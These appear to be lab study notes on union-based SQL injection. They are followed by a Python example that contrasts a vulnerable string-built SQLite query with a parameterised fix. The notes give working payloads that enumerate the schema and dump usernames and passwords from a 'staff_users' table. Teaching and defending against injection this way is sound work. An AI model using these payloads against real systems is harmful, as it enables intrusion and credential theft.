➡️ In-Band SQLi

Two types:

  • Error-Based SQLi

  • Union-Based SQLi

Example of a Union-Based SQLi:

  1. Try to find how many columns the original SELECT query returns

    1 UNION SELECT 1 → error

    1 UNION SELECT 1,2 → error

    1 UNION SELECT 1,2,3 → success!

    So, in this case, we have 3 columns

  2. If the page only shows the first row of the result, use an id that matches nothing so that only the injected row is returned: 0 UNION SELECT 1,2,3

  3. Get the database name

    0 UNION SELECT 1,2,database()

  4. Then do the same for the tables and columns of the database that was found

    0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

    0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

  5. Finally, concatenate the columns whose values you want to dump

    0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
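The notes above describe what the attacker sees; this added example (not from the original page) reproduces the root cause and its fix against a constructed SQLite table. The same column-count payloads from step 1 error or succeed against the string-built query, while the parameterised query treats them as a plain value that matches nothing. The `articles` table and the `lookup_*` function names are assumptions made for this example.

```python
import sqlite3


def make_db():
    # Constructed in-memory fixture (not from the original notes): a three-column
    # table, so a UNION payload needs exactly three values to succeed.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT)")
    con.execute("INSERT INTO articles VALUES (1, 'Hello', 'First post')")
    con.execute("INSERT INTO articles VALUES (2, 'World', 'Second post')")
    return con


def lookup_vulnerable(con, article_id):
    # Vulnerable pattern: the request parameter is pasted into the statement text,
    # so "1 UNION SELECT ..." becomes SQL syntax instead of an id.
    sql = f"SELECT id, title, body FROM articles WHERE id = {article_id}"
    return con.execute(sql).fetchall()


def lookup_safe(con, article_id):
    # Hardened pattern: a bound parameter is always a value, never SQL syntax.
    # The injected string is compared to the id column and simply matches no row.
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return con.execute(sql, (article_id,)).fetchall()


def union_errors(con, payload):
    # Reports whether the payload triggers a database error in the vulnerable
    # lookup. A mismatched column count raises; the matching count does not.
    try:
        lookup_vulnerable(con, payload)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    for p in ("1 UNION SELECT 1", "1 UNION SELECT 1,2", "1 UNION SELECT 1,2,3"):
        print(p, "->", "error" if union_errors(db, p) else "success")
    # Step 2 from the notes: id 0 matches nothing, so only the injected row is shown.
    print("vulnerable:", lookup_vulnerable(db, "0 UNION SELECT 1,2,3"))
    print("safe      :", lookup_safe(db, "0 UNION SELECT 1,2,3"))
```

The error raised for the wrong column counts is the same "error" recorded in step 1 of the notes, and a burst of such database errors from one client is a useful detection signal for this probing.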
